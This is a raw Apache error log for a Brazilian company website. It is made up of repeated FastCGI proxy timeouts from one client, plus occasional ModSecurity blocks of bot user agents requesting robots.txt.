[Tue Mar 17 01:26:34.126537 2026] [proxy_fcgi:error] [pid 11293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59192] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:26:55.129794 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59412] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:27:16.125795 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59604] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:27:38.137824 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:28:00.130211 2026] [proxy_fcgi:error] [pid 2304:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:28:21.127857 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60144] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:28:42.133866 2026] [proxy_fcgi:error] [pid 4740:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60302] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:29:03.123469 2026] [proxy_fcgi:error] [pid 2305:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:29:24.094985 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:29:45.126478 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60892] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:30:01.074097 2026] [:error] [pid 4740:tid 140411716749056] [client 74.7.244.31:38922] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjYyQfYLcKp6Sb5AeIIsgAAAEM"]
[Tue Mar 17 01:30:08.125495 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:32914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:30:29.128133 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33118] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:30:50.142487 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:31:12.133795 2026] [proxy_fcgi:error] [pid 2304:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:31:35.126476 2026] [proxy_fcgi:error] [pid 2325:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:31:56.093824 2026] [proxy_fcgi:error] [pid 4740:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33886] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:32:17.125829 2026] [proxy_fcgi:error] [pid 2325:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34174] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:32:38.133782 2026] [proxy_fcgi:error] [pid 2325:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34376] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:32:59.037802 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34522] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:33:22.138016 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34660] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:33:43.129811 2026] [proxy_fcgi:error] [pid 11293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:34:04.125791 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:34:26.327430 2026] [proxy_fcgi:error] [pid 2325:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:34:48.125864 2026] [proxy_fcgi:error] [pid 4740:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:35:04.105364 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.244.31:59714] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjZ-O82sZHvlq4xgHqT7gAAAoo"]
[Tue Mar 17 01:35:09.125775 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:35:31.126107 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35636] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:35:52.129800 2026] [proxy_fcgi:error] [pid 2325:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35858] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:36:13.121797 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35988] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:36:35.129794 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:36:56.137777 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36320] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:37:17.141785 2026] [proxy_fcgi:error] [pid 2305:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36498] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:37:39.115696 2026] [proxy_fcgi:error] [pid 11293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36720] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:38:00.137814 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36898] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:38:21.133878 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37068] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:38:44.149791 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37228] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:39:05.132524 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:39:26.137816 2026] [proxy_fcgi:error] [pid 4740:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:39:47.073944 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:40:10.125808 2026] [proxy_fcgi:error] [pid 4740:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:40:31.033861 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:40:52.132641 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:41:13.117841 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38486] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:41:34.137811 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38728] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:41:56.129838 2026] [proxy_fcgi:error] [pid 2304:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38898] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:42:17.140669 2026] [proxy_fcgi:error] [pid 4740:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:42:21.690547 2026] [:error] [pid 4740:tid 140411683178240] [client 74.7.244.31:55528] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjbrQfYLcKp6Sb5AeIJkwAAAEc"]
[Tue Mar 17 01:42:39.049912 2026] [proxy_fcgi:error] [pid 11469:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:43:00.116197 2026] [proxy_fcgi:error] [pid 2304:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39520] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:43:11.172437 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.228.16:50816] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjb36BJNF7axNlVR0XPawAAAAQ"]
[Tue Mar 17 01:43:22.061794 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:43:43.129887 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39986] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:44:05.130652 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:44:26.118607 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40324] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:44:47.122791 2026] [proxy_fcgi:error] [pid 11293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:45:08.134045 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40602] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:45:31.129932 2026] [proxy_fcgi:error] [pid 2325:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40860] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:45:52.125787 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41028] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:46:13.102087 2026] [proxy_fcgi:error] [pid 4740:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:46:34.125854 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41222] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:46:56.114558 2026] [proxy_fcgi:error] [pid 2304:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41330] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:47:17.115317 2026] [proxy_fcgi:error] [pid 11293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:47:29.255062 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.244.31:46340] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjc4ZDEJR9VXonE_-0b_wAAAQs"]
[Tue Mar 17 01:47:38.058426 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41622] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:47:46.438228 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.228.16:45978] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjc8pDEJR9VXonE_-0cBQAAAQ4"]
[Tue Mar 17 01:48:00.121792 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41838] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:48:21.133795 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:48:40.171374 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] [client 62.151.179.222:49450] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Tue Mar 17 01:48:43.126404 2026] [proxy_fcgi:error] [pid 11469:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42208] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:49:05.132587 2026] [proxy_fcgi:error] [pid 2304:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:49:27.118618 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:49:48.069818 2026] [proxy_fcgi:error] [pid 11293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:50:09.133811 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:50:30.129779 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43002] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:50:51.613801 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:51:13.057858 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43586] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:51:34.061873 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:51:55.129337 2026] [proxy_fcgi:error] [pid 2305:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:52:16.125972 2026] [proxy_fcgi:error] [pid 11469:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44156] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:52:38.042085 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44324] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:52:55.459558 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.244.31:39554] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjeJwQohV2v-7oj5HHPCwAAAY4"]
[Tue Mar 17 01:52:59.125826 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44524] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:53:21.067209 2026] [proxy_fcgi:error] [pid 2325:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44726] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:53:29.254618 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.228.16:51782] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjeSaBJNF7axNlVR0XQWQAAABM"]
[Tue Mar 17 01:53:42.126270 2026] [proxy_fcgi:error] [pid 11293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:54:03.033849 2026] [proxy_fcgi:error] [pid 4740:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45240] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:54:26.121873 2026] [proxy_fcgi:error] [pid 2304:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45370] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:54:54.126122 2026] [proxy_fcgi:error] [pid 11293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45578] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:55:15.025795 2026] [proxy_fcgi:error] [pid 11293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45734] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:55:37.113876 2026] [proxy_fcgi:error] [pid 2304:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:55:58.115127 2026] [proxy_fcgi:error] [pid 2305:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:56:19.121794 2026] [proxy_fcgi:error] [pid 11293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:56:19.468764 2026] [proxy_fcgi:error] [pid 2304:tid 140411691570944] [client 205.185.123.125:43564] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 01:56:40.128938 2026] [proxy_fcgi:error] [pid 2325:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:57:01.121899 2026] [proxy_fcgi:error] [pid 11469:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:57:22.129950 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46652] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:57:43.153844 2026] [proxy_fcgi:error] [pid 11293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46818] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:57:59.937410 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.244.31:43396] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjfV9CmCSWTlPouqoqeeQAAANg"]
[Tue Mar 17 01:58:04.045908 2026] [proxy_fcgi:error] [pid 11469:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46988] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:58:25.096151 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:58:46.125896 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:58:47.555304 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.228.16:39276] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjfhwQohV2v-7oj5HHPcQAAAYw"]
[Tue Mar 17 01:59:07.126388 2026] [proxy_fcgi:error] [pid 11469:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47454] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:59:28.137147 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:59:49.137791 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:00:16.130508 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48090] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:00:37.098447 2026] [proxy_fcgi:error] [pid 2325:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:00:58.023589 2026] [proxy_fcgi:error] [pid 2304:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48310] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:01:20.129788 2026] [proxy_fcgi:error] [pid 2325:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48434] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:01:41.087985 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48580] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:02:03.113831 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48724] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:02:24.121824 2026] [proxy_fcgi:error] [pid 11293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:02:45.130216 2026] [proxy_fcgi:error] [pid 2325:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:03:06.123641 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:03:27.125913 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:03:48.149008 2026] [proxy_fcgi:error] [pid 2305:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:03:52.646344 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.228.16:43614] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjguO82sZHvlq4xgHqWSQAAApg"]
[Tue Mar 17 02:04:09.061987 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50542] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:04:30.129797 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:04:51.137821 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51088] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:05:13.154141 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:05:37.157845 2026] [proxy_fcgi:error] [pid 11293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:05:59.141819 2026] [proxy_fcgi:error] [pid 2325:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:06:20.142570 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:06:42.135167 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:07:04.137855 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52358] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:07:25.102860 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52500] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:07:46.133803 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52732] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:08:07.125840 2026] [proxy_fcgi:error] [pid 4740:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52898] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:08:28.130558 2026] [proxy_fcgi:error] [pid 2304:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:08:40.387365 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.244.31:53026] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjh2NCmCSWTlPouqoqfWQAAAMY"]
[Tue Mar 17 02:08:49.106801 2026] [proxy_fcgi:error] [pid 2325:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53298] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:09:10.045874 2026] [proxy_fcgi:error] [pid 11293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53448] AH01075: Error dispatching request to : (polling)
